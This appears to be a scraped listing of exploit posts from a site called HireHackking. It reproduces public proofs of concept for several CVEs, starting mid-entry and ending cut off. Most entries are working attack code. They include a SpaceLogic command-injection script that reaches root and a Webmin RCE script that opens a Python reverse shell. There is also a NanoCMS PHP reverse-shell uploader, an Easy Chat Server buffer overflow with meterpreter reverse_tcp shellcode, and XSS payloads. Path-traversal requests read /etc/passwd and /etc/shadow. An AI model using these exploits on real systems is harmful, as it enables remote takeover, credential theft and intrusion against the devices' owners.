select(STDOUT); 08: $| = 1; 09: 10: #print "\r\n\r\n"; 11: 12: $CGITempFile::TMPDIRECTORY = '/mnt/microsd/clipsal/ugen/imgs/'; 13: use CGI; 14: 15: my $PROGNAME = "delsnap.pl"; 16: 17: my $cgi = new CGI(); 18: 19: my $name = $cgi->param('name'); 20: if ($name eq "list") { 21: print "\r\n\r\n"; 22: print "DATA="; 23: print `ls -C1 /mnt/microsd/clipsal/ugen/imgs/`; 24: exit(0); 25: } 26: if ($name eq "deleteall") { 27: print "\r\n\r\n"; 28: print "DELETINGALL=TRUE&"; 29: print `rm /mnt/microsd/clipsal/ugen/imgs/*`; 30: print "COMPLETED=true\n"; 31: exit(0); 32: } 33: #print "name $name\n"; 34: print "\r\n\r\n"; 35: my $filename = "/mnt/microsd/clipsal/ugen/imgs/$name"; 36: 37: unlink $filename or die "COMPLETED=false\n"; 38: 39: print "COMPLETED=true\n"; ========================================================= Tested on: Machine: OMAP3 Wiser2 Board CPU: ARMv7 revision 2 GNU/Linux 2.6.37 (armv7l) BusyBox v1.22.1 thttpd/2.25b Perl v5.20.0 Clipsal 81 Angstrom 2009.X-stable PICED 4.14.0.100 lighttpd/1.7 GCC 4.4.3 NodeJS v10.15.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5710 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5710.php Vendor advisory: https://download.schneider-electric.com/files?p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2022-193-02_SpaceLogic-C-Bus-Home-Controller-Wiser_MK2_Security_Notification.pdf CVE ID: CVE-2022-34753 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34753 27.03.2022 #> $host.UI.RawUI.ForegroundColor = "Green" if ($($args.Count) -ne 2) { Write-Host("`nUsage: .\SpaceLogic.ps1 [IP] [CMD]`n") } else { $ip = $args[0] $cmd = $args[1] $cmdinj = "/delsnap.pl?name=|$cmd" Write-Host("`nSending command '$cmd' to $ip`n") #curl -Headers @{Authorization = "Basic XXXX"} -v $ip$cmdinj curl -v $ip$cmdinj } <#PoC PS C:\> .\SpaceLogic.ps1 Usage: .\SpaceLogic.ps1 [IP] [CMD] PS C:\> .\SpaceLogic.ps1 192.168.1.2 "uname -a;id;pwd" Sending command 'uname -a;id;pwd' to 192.168.1.2 VERBOSE: GET http://192.168.1.2/delsnap.pl?name=|uname -a;id;pwd with 0-byte payload VERBOSE: received 129-byte response of content type text/html; charset=utf-8 StatusCode : 200 StatusDescription : OK Content : Linux localhost 2.6.37-g4be9a2f-dirty #111 Wed May 21 20:39:38 MYT 2014 armv7l GNU/Linux uid=0(root) gid=0(root) /custom-package RawContent : HTTP/1.1 200 OK Access-Control-Allow-Origin: * Connection: keep-alive Content-Length: 129 Content-Type: text/html; charset=utf-8 Date: Thu, 30 Jun 2022 14:48:43 GMT ETag: W/"81-LTIWJvYlDBYAlgXEy... Forms : {} Headers : {[Access-Control-Allow-Origin, *], [Connection, keep-alive], [Content-Length, 129], [Content-Type, text/html; charset=utf-8]...} Images : {} InputFields : {} Links : {} ParsedHtml : mshtml.HTMLDocumentClass RawContentLength : 129 PS C:\> #>
  10. HireHackking

    WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS) # Date: 21/07/2022 # Exploit Author: Steffin Stanly # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://wordpress.org/plugins/wp-useronline/ # Version: <=2.87.6 # Tested on Windows How to reproduce vulnerability: 1. Install WordPress 6.0.1 2. Install and activate WP-UserOnline plugin. 3. Navigate to Setting >> WP-UserOnline and enter the data into the User(s) Browsing Site. 4. Add the following payload "><script>alert(1)</script> and save changes 5. On visiting the dashboard, You will observe that the payload successfully got stored in the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.
  11. HireHackking

    Wavlink WN533A8 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS) # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M33A8.V5030.190716 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34048 # Tested on: Windows # Poc code <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST"> <input type="hidden" name="newUI" value="1" /> <input type="hidden" name="page" value="login" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="langChange" value="0" /> <input type="hidden" name="ipaddr" value="196&#46;219&#46;234&#46;10" /> <input type="hidden" name="login&#95;page" value="x"&#41;&#59;alert&#40;9&#41;&#59;x&#61;&#40;"" /> <input type="hidden" name="homepage" value="main&#46;shtml" /> <input type="hidden" name="sysinitpage" value="sysinit&#46;shtml" /> <input type="hidden" name="wizardpage" value="wiz&#46;shtml" /> <input type="hidden" name="hostname" value="59&#46;148&#46;80&#46;138" /> <input type="hidden" name="key" value="M94947765" /> <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" /> <input type="hidden" name="lang&#95;select" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  12. HireHackking

    Wavlink WN533A8 - Password Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wavlink WN533A8 - Password Disclosure # Date: 2022-06-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M33A8.V5030.190716 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34046 # Tested on: Windows # Exploit view-source:http://IP_ADDRESS/sysinit.shtml search for var syspasswd=" you will find the username and the password
  13. HireHackking

    WordPress Plugin Duplicator 1.4.7 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure # Google Dork: N/A # Date: 07.27.2022 # Exploit Author: SecuriTrust # Vendor Homepage: https://snapcreek.com/ # Software Link: https://wordpress.org/plugins/duplicator/ # Version: <= 1.4.7 # Tested on: Linux, Windows # CVE : CVE-2022-2552 # Reference: https://securitrust.fr # Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552 #Product: WordPress Plugin Duplicator <= 1.4.7 #Vulnerability: 1-Some system information may be disclosure. #Proof-Of-Concept: 1-System information. Some system information is obtained using the "view" parameter. http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
  14. HireHackking

    WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download # Google Dork: N/A # Date: 07.27.2022 # Exploit Author: SecuriTrust # Vendor Homepage: https://snapcreek.com/ # Software Link: https://wordpress.org/plugins/duplicator/ # Version: < 1.4.7 # Tested on: Linux, Windows # CVE : CVE-2022-2551 # Reference: https://securitrust.fr # Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551 #Product: WordPress Plugin Duplicator < 1.4.7 #Vulnerability: 1-It allows an attacker to download the backup file. #Proof-Of-Concept: 1-Backup download. The backup file can be downloaded using the "is_daws" parameter. http://[PATH]/backups-dup-lite/dup-installer/main.installer.php
  15. HireHackking

    Wavlink WN530HG4 - Password Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wavlink WN530HG4 - Password Disclosure # Date: 2022-06-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: M30HG4.V5030.191116 # Vendor home page : wavlink.com # Authentication Required: No # CVE : CVE-2022-34047 # Tested on: Windows # Exploit view-source:http://IP_address/set_safety.shtml?r=52300 search for var syspasswd=" you will find the username and the password
  16. HireHackking

    CuteEditor for PHP 6.6 - Directory Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal # Google Dork: N/A # Date: November 17th, 2021 # Exploit Author: Stefan Hesselman # Vendor Homepage: http://phphtmledit.com/ # Software Link: http://phphtmledit.com/download/phphtmledit.zip # Version: 6.6 # Tested on: Windows Server 2019 # CVE : N/A There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root. File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121 Vulnerable code: [SNIP] function ServerMapPath($input_path,$absolute_path,$virtual_path) { if($absolute_path!="") { return $absolute_path.str_ireplace($virtual_path,"",$input_path); } else { if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN')) { if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF']))); } if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) { $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF']))); } return $_SERVER["DOCUMENT_ROOT"].$input_path; } else { return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path; } } } [SNIP] ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file. File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56 Vulnerable function (renamefile, line 57): [SNIP] switch ($action) { [SNIP] case "renamefile": rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath)); print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>"; break; [SNIP] $input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes: C:\Inetpub\wwwroot\..\..\..\poc.html Final result: writes poc.html to the webroot. STEPS: 1. Create a poc.html file (XSS PoC will do). <HTML> <title>Path Traversal PoC</title> <BODY> <h1>PoC</h1> <script>alert('directory traversal');</script> </BODY> </HTML> 2. Upload poc.html via the "Insert Templates" page using the "Upload files" option. 3. Select poc.html and select "Rename File". 4. Click on the pencil icon to the right of the poc.html file. 5. Rename file to "..\..\..\poc.html". 6. Press OK. poc.html is written three directories up. This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.
  17. HireHackking

    mPDF 7.0 - Local File Inclusion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: mPDF 7.0 - Local File Inclusion # Google Dork: N/A # Date: 2022-07-23 # Exploit Author: Musyoka Ian # Vendor Homepage: https://mpdf.github.io/ # Software Link: https://mpdf.github.io/ # Version: CuteNews # Tested on: Ubuntu 20.04, mPDF 7.0.x # CVE: N/A #!/usr/bin/env python3 from urllib.parse import quote from cmd import Cmd from base64 import b64encode class Terminal(Cmd): prompt = "\nFile >> " def default(self, args): payload_gen(args) def banner(): banner = """ _____ _____ ______ ______ ___ __ __ _ _ _ | __ \| __ \| ____| |____ / _ \ \ \ / / | | (_) | _ __ ___ | |__) | | | | |__ / / | | | \ V / _____ ___ __ | | ___ _| |_ | '_ ` _ \| ___/| | | | __| / /| | | | > < / _ \ \/ / '_ \| |/ _ \| | __| | | | | | | | | |__| | | / / | |_| | / . \ | __/> <| |_) | | (_) | | |_ |_| |_| |_|_| |_____/|_| /_/ (_)___(_)_/ \_\ \___/_/\_\ .__/|_|\___/|_|\__| | | |_| """ print(banner) def payload_gen(fname): payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />' encoded_payload = quote(payload) print("[+] Replace the content with the payload below") print(f"Url encoded payload:\n{encoded_payload}\n") base64enc = b64encode(encoded_payload.encode()) print(f"Base64 encoded payload:\n{base64enc.decode()}\n") if __name__ == ("__main__"): banner() print("Enter Filename eg. /etc/passwd") terminal= Terminal() terminal.cmdloop()
  18. HireHackking

    Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-25 # Exploit Author: Emir Polat # Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165 # Vendor Homepage: https://www.webmin.com/ # Software Link: https://www.webmin.com/download.html # Version: < 1.997 # Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64) # CVE: CVE-2022-36446 import argparse import requests from bs4 import BeautifulSoup def login(args): global session global sysUser session = requests.Session() loginUrl = f"{args.target}:10000/session_login.cgi" infoUrl = f"{args.target}:10000/sysinfo.cgi" username = args.username password = args.password data = {'user': username, 'pass': password} login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'}) sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']}) bs = BeautifulSoup(sysInfo.text, 'html.parser') sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs] if sysUser: return True else: return False def exploit(args): payload = f""" 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'); """ updateUrl = f"{args.target}:10000/package-updates" exploitUrl = f"{args.target}:10000/package-updates/update.cgi" exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'} if login(args): print("[+] Successfully Logged In !") print(f"[+] Session Cookie => sid={session.cookies['sid']}") print(f"[+] User Found => {sysUser[0]}") res = session.get(updateUrl) bs = BeautifulSoup(res.text, 'html.parser') updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs] if updateAccess[0] == "package-updates": print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>") print(f"[+] Exploit starting ... ") print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}") session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'}) session.post(exploitUrl, data=exploitData) else: print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>") else: print("[-] Login Failed !") if __name__ == '__main__': parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)") parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True) parser.add_argument('-u', '--username', help='Username For Login', required=True) parser.add_argument('-p', '--password', help='Password For Login', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False) args = parser.parse_args() exploit(args)
  19. HireHackking

    NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-07-26 # Exploit Auuthor: p1ckzi # Vendor Homepage: https://github.com/kalyan02/NanoCMS # Version: NanoCMS v0.4 # Tested on: Linux Mint 20.3 # CVE: N/A # # Description: # this script uploads a php reverse shell to the target. # NanoCMS does not sanitise the data of an authenticated user while creating # webpages. pages are saved with .php extensions by default, allowing an # authenticated attacker access to the underlying system: # https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt #!/usr/bin/env python3 import argparse import bs4 import errno import re import requests import secrets import sys def arguments(): parser = argparse.ArgumentParser( formatter_class=argparse.RawDescriptionHelpFormatter, description=f"{sys.argv[0]} exploits authenticated file upload" "\nand remote code execution in NanoCMS v0.4", epilog=f"examples:" f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php" f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a" f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'" ) parser.add_argument( "address", help="schema/ip/hostname, port, sub-directories" " to the vulnerable NanoCMS server" ) parser.add_argument( "file", help="php file to upload" ) parser.add_argument( "-u", "--user", help="username", default="admin" ) parser.add_argument( "-p", "--passwd", help="password", default="demo" ) parser.add_argument( "-e", "--execute", help="attempts to make a request to the uploaded" " file (more useful if uploading a reverse shell)", action="store_true", default=False ) parser.add_argument( "-a", "--accessible", help="turns off features" " which may negatively affect screen readers", action="store_true", default=False ) parser.add_argument( "-n", "--no-colour", help="removes colour output", action="store_true", default=False ) arguments.option = parser.parse_args() # settings for terminal output defined by user in term_settings(). class settings(): # colours. c0 = "" c1 = "" c2 = "" # information boxes. i1 = "" i2 = "" i3 = "" i4 = "" # checks for terminal setting flags supplied by arguments(). def term_settings(): if arguments.option.accessible: small_banner() elif arguments.option.no_colour: settings.i1 = "[+] " settings.i2 = "[!] " settings.i3 = "[i] " settings.i4 = "$ " banner() elif not arguments.option.accessible or arguments.option.no_colour: settings.c0 = "\u001b[0m" # reset. settings.c1 = "\u001b[38;5;1m" # red. settings.c2 = "\u001b[38;5;2m" # green. settings.i1 = "[+] " settings.i2 = "[!] " settings.i3 = "[i] " settings.i4 = "$ " banner() else: print("something went horribly wrong!") sys.exit() # default terminal banner (looks prettier when run lol) def banner(): print( "\n .__ .__" " .__ " "\n ____ _____ ____ ____ ____ _____ _____| |__ ____ | " "| | | " "\n / \\__ \\ / \\ / _ \\_/ ___\\ / \\ / ___/ | \\_/ " "__ \\| | | | " "\n| | \\/ __ \\| | ( <_> ) \\___| Y Y \\___ \\| Y \\ _" "__/| |_| |__" "\n|___| (____ /___| /\\____/ \\___ >__|_| /____ >___| /\\___ " ">____/____/" "\n \\/ \\/ \\/ \\/ \\/ \\/ \\/ " " \\/" ) def small_banner(): print( f"{sys.argv[0]}" "\nNanoCMS authenticated file upload and rce..." ) # appends a '/' if not supplied at the end of the address. def address_check(address): check = re.search('/$', address) if check is not None: print('') else: arguments.option.address += "/" # creates a new filename for each upload. # errors occur if the filename is the same as a previously uploaded one. def random_filename(): random_filename.name = secrets.token_hex(4) # note: after a successful login, credentials are saved, so further reuse # of the script will most likely not require correct credentials. def login(address, user, passwd): post_header = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) " "Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml," "application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "", "Connection": "close", "Referer": f"{arguments.option.address}data/nanoadmin.php", "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5", "Upgrade-Insecure-Requests": "1", } post_data = { "user": f"{user}", "pass": f"{passwd}" } url_request = requests.post( address + 'data/nanoadmin.php?', headers=post_header, data=post_data, verify=False, timeout=30 ) signin_error = url_request.text if 'Error : wrong Username or Password' in signin_error: print( f"{settings.c1}{settings.i2}could " f"sign in with {arguments.option.user}/" f"{arguments.option.passwd}.{settings.c0}" ) sys.exit(1) else: print( f"{settings.c2}{settings.i1}logged in successfully." f"{settings.c0}" ) def exploit(address, file, name): with open(arguments.option.file, 'r') as file: file_contents = file.read().rstrip() post_header = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) " "Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml," "application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "", "Connection": "close", "Referer": f"{arguments.option.address}data/nanoadmin.php?action=" "addpage", "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5", "Upgrade-Insecure-Requests": "1", } post_data = { "title": f"{random_filename.name}", "save": "Add Page", "check_sidebar": "sidebar", "content": f"{file_contents}" } url_request = requests.post( address + 'data/nanoadmin.php?action=addpage', headers=post_header, data=post_data, verify=False, timeout=30 ) if url_request.status_code == 404: print( f"{settings.c1}{settings.i2}{arguments.option.address} could " f"not be uploaded.{settings.c0}" ) sys.exit(1) else: print( f"{settings.c2}{settings.i1}file posted." f"{settings.c0}" ) print( f"{settings.i3}if successful, file location should be at:" f"\n{address}data/pages/{random_filename.name}.php" ) def execute(address, file, name): print( f"{settings.i3}making web request to uploaded file." ) print( f"{settings.i3}check listener if reverse shell uploaded." ) url_request = requests.get( address + f'data/pages/{random_filename.name}.php', verify=False ) if url_request.status_code == 404: print( f"{settings.c1}{settings.i2}{arguments.option.file} could " f"not be found." f"\n{settings.i2}antivirus may be blocking your upload." f"{settings.c0}" ) else: sys.exit() def main(): try: arguments() term_settings() address_check(arguments.option.address) random_filename() if arguments.option.execute: login( arguments.option.address, arguments.option.user, arguments.option.passwd ) exploit( arguments.option.address, arguments.option.file, random_filename.name, ) execute( arguments.option.address, arguments.option.file, random_filename.name, ) else: login( arguments.option.address, arguments.option.user, arguments.option.passwd ) exploit( arguments.option.address, arguments.option.file, random_filename.name, ) except KeyboardInterrupt: print(f"\n{settings.i3}quitting.") sys.exit() except requests.exceptions.Timeout: print( f"{settings.c1}{settings.i2}the request timed out " f"while attempting to connect.{settings.c0}" ) sys.exit() except requests.ConnectionError: print( f"{settings.c1}{settings.i2}could not connect " f"to {arguments.option.address}{settings.c0}" ) sys.exit() except FileNotFoundError: print( f"{settings.c1}{settings.i2}{arguments.option.file} " f"could not be found.{settings.c0}" ) except ( requests.exceptions.MissingSchema, requests.exceptions.InvalidURL, requests.exceptions.InvalidSchema ): print( f"{settings.c1}{settings.i2}a valid schema and address " f"must be supplied.{settings.c0}" ) sys.exit() if __name__ == "__main__": main()
  20. HireHackking

    Omnia MPX 1.5.0+r1 - Path Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Omnia MPX 1.5.0+r1 - Path Traversal # Date: 24/7/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.telosalliance.com/ # Software Link: https://support.telosalliance.com/article/934ixoaz3l-mpx-node-release-notes-and-update-instructions # Version: 1.5.0+r1 # Tested on: MacOS # PoC: http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/passwd http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..//etc/shadow User Database: http://10.10.10.32:19630/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
  21. HireHackking

    Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH) # Exploit Author: r00tpgp @ http://www.r00tpgp.com # Usage: python easychat-exploit.py <victim-ip> <port> # Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990 # CVE: CVE-2004-2466 # Installer: http://www.echatserver.com/ # Tested on: Microsoft Windows 11 Pro x86-64 (10.0.22000 N/A Build 22000) #!/usr/bin/python3 import sys import socket from struct import pack host = sys.argv[1] # Recieve IP from user port = int(sys.argv[2]) # Recieve Port from user junk = b"A" * 217 nseh = pack("<L", 0x06eb9090) # short jump 6 bytes seh = pack("<L", 0x1001ae86) # pop pop ret 1001AE86 SSLEAY32.DLL # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990 -f python -b "\x00\x20" -v shellcode shellcode = b"\x90" * 16 shellcode += b"\xbb\xb4\xa4\x34\xc3\xdd\xc1\xd9\x74\x24\xf4\x5a\x33" shellcode += b"\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\x5e\x58\xd6" shellcode += b"\x36\x62\x49\x95\xb9\x9a\x8a\xfa\x30\x7f\xbb\x3a\x26" shellcode += b"\xf4\xec\x8a\x2c\x58\x01\x60\x60\x48\x92\x04\xad\x7f" shellcode += b"\x13\xa2\x8b\x4e\xa4\x9f\xe8\xd1\x26\xe2\x3c\x31\x16" shellcode += b"\x2d\x31\x30\x5f\x50\xb8\x60\x08\x1e\x6f\x94\x3d\x6a" shellcode += b"\xac\x1f\x0d\x7a\xb4\xfc\xc6\x7d\x95\x53\x5c\x24\x35" shellcode += b"\x52\xb1\x5c\x7c\x4c\xd6\x59\x36\xe7\x2c\x15\xc9\x21" shellcode += b"\x7d\xd6\x66\x0c\xb1\x25\x76\x49\x76\xd6\x0d\xa3\x84" shellcode += b"\x6b\x16\x70\xf6\xb7\x93\x62\x50\x33\x03\x4e\x60\x90" shellcode += b"\xd2\x05\x6e\x5d\x90\x41\x73\x60\x75\xfa\x8f\xe9\x78" shellcode += b"\x2c\x06\xa9\x5e\xe8\x42\x69\xfe\xa9\x2e\xdc\xff\xa9" shellcode += b"\x90\x81\xa5\xa2\x3d\xd5\xd7\xe9\x29\x1a\xda\x11\xaa" shellcode += b"\x34\x6d\x62\x98\x9b\xc5\xec\x90\x54\xc0\xeb\xd7\x4e" shellcode += b"\xb4\x63\x26\x71\xc5\xaa\xed\x25\x95\xc4\xc4\x45\x7e" shellcode += b"\x14\xe8\x93\xd1\x44\x46\x4c\x92\x34\x26\x3c\x7a\x5e" shellcode += b"\xa9\x63\x9a\x61\x63\x0c\x31\x98\xe4\xf3\x6e\xd4\xf0" shellcode += b"\x9b\x6c\x18\xf8\xe6\xf8\xfe\x90\x08\xad\xa9\x0c\xb0" shellcode += b"\xf4\x21\xac\x3d\x23\x4c\xee\xb6\xc0\xb1\xa1\x3e\xac" shellcode += b"\xa1\x56\xcf\xfb\x9b\xf1\xd0\xd1\xb3\x9e\x43\xbe\x43" shellcode += b"\xe8\x7f\x69\x14\xbd\x4e\x60\xf0\x53\xe8\xda\xe6\xa9" shellcode += b"\x6c\x24\xa2\x75\x4d\xab\x2b\xfb\xe9\x8f\x3b\xc5\xf2" shellcode += b"\x8b\x6f\x99\xa4\x45\xd9\x5f\x1f\x24\xb3\x09\xcc\xee" shellcode += b"\x53\xcf\x3e\x31\x25\xd0\x6a\xc7\xc9\x61\xc3\x9e\xf6" shellcode += b"\x4e\x83\x16\x8f\xb2\x33\xd8\x5a\x77\x43\x93\xc6\xde" shellcode += b"\xcc\x7a\x93\x62\x91\x7c\x4e\xa0\xac\xfe\x7a\x59\x4b" shellcode += b"\x1e\x0f\x5c\x17\x98\xfc\x2c\x08\x4d\x02\x82\x29\x44" buffer = b"GET /chat.ghp?username=" + junk + nseh + seh + shellcode + b"&password=&room=1&sex=1 HTTP/1.1\r\n" buffer += b"User-Agent: Mozilla/4.0\r\n" buffer += b"Host: 192.168.1.136:80\r\n" buffer += b"Accept-Language: en-us\r\n" buffer += b"Accept-Encoding: gzip, deflate\r\n" buffer += b"Referer: http://192.168.1.136\r\n" buffer += b"Connection: Keep-Alive\r\n\r\n" print("[*] Sending evil buffer...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(buffer) s.close() print("[+] Done!")
  22. HireHackking

    uftpd 2.10 - Directory Traversal (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: uftpd 2.10 - Directory Traversal (Authenticated) # Google Dork: N/A # Exploit Author: Aaron Esau (arinerron) # Vendor Homepage: https://github.com/troglobit/uftpd # Software Link: https://github.com/troglobit/uftpd # Version: 2.7 to 2.10 # Tested on: Linux # CVE : CVE-2020-20277 # Reference: https://nvd.nist.gov/vuln/detail/CVE-2020-20277 # Reference: https://arinerron.com/blog/posts/6 #Product: uftpd 2.7 to 2.10 #Proof-Of-Concept: 1-Arbitrary files could be read using directory traversal if the application is not running as root after authenticating. If the server has anonymous login enabled, it will be possible to read arbitrary files even without authentication. #Steps 1-Setup nc listener on attacking machine on TCP port 1258 nc -lnvp 1258 2-Login to the FTP service 3-List files ftp> ls ../../../ 3-Set attacker's IP address and retrieve files PORT 127,0,0,1,1,1002 RETR ../../../etc/passwd
  23. HireHackking

    ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ThingsBoard 3.3.1 'name' - Stored Cross-Site Scripting (XSS) # Date: 03/08/2022 # Exploit Author: Steffen Langenfeld & Sebastian Biehler # Vendor Homepage: https://thingsboard.io/ # Software Link: https://github.com/thingsboard/thingsboard/releases/tag/v3.3.1 # Version: 3.3.1 # CVE : CVE-2021-42750 # Tested on: Linux #Proof-Of-Concept: When creating a rule node (any) and putting a script payload inside the name of the rule node, it is executed upon hovering above the node within the editor. #Steps 1. Create a new rule node (via the menu "Rule chains") 2. Put a javascript payload within the name e.g <script>alert('XSS')</script> 3. Save the node 4. Upon hovering above the node within the editor the payload is executed
  24. HireHackking

    Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Feehi CMS 2.1.1 - Stored Cross-Site Scripting (XSS) # Date: 02-08-2022 # Exploit Author: Shivam Singh # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms #Profile Link: https://www.linkedin.com/in/shivam-singh-3906b0203/ # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Windows, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1-Sing-up https://localhost.cms.feehi/ 2-Inject The XSS Payload in Username: "><script>alert(document.cookie)</script> fill all required fields and click the SignUp button 3-Login to Your Account, Go to any article page then XSS will trigger.
  25. HireHackking

